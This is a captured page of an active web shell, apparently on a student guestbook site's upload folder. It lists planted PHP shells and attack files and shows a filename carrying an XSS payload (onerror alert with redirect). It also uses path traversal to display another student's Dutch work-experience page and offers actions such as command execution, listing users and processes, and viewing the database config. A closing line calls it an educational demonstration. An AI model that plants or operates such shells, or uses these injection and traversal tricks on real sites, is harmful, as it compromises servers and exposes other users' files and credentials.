🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../579882.klas4s23.mid-ica.nl/public_html/werkervaring.html

<!DOCTYPE html>
<html lang="en">
<head>
  <link rel="stylesheet" href="index.css"
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>werkervaring</title> <link rel="stylesheet" href="index.css"
</head>
<body>
     <style>
        body {
          background-image: url(istockphoto-1007122208-612x612.jpg)
        }
        </style> 
    
    
  
  
  </body>
    <h1 style="color: rgb(0, 0, 0);">werkervaring</h1>
    <p style="color: rgb(0, 0, 0);"> ik begon op mijn 13de al te werken dat was eerst bij mijn vader niet al te zwaar werk
    drna op mijn 14de begon ik bij een garage te werken als auto schoonmaker dat deed ik tot mijn 15 begin 16 
daarna begin 16 werkte ik bij febo als bezorgen dat deed ik maar 2 maanden vond het niet zo leuk daarna ging ik bij thuisbezorgd bezorgen dat deed
 rond mijn eind 16 daarna wou ik weer binnen keuken gaan werken toen ging ik naar mac donalds daar werkte ik bijna een jaar lang 
ik was daarna gestopt vanwege mijn examen en in die tijd werd ik gevraagd door febo of je wilt werken binnen in keuken dat is wat ik nu doe
maar ben er niet echt blij mee binnenkort ga ik weer werken bij mac donalds dat waren werken die ik heb gedaan 
keuken,bezorgen en schoonmaken auto's</p>

<a href="pagina.html"> 
  <button> home</button>

    
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!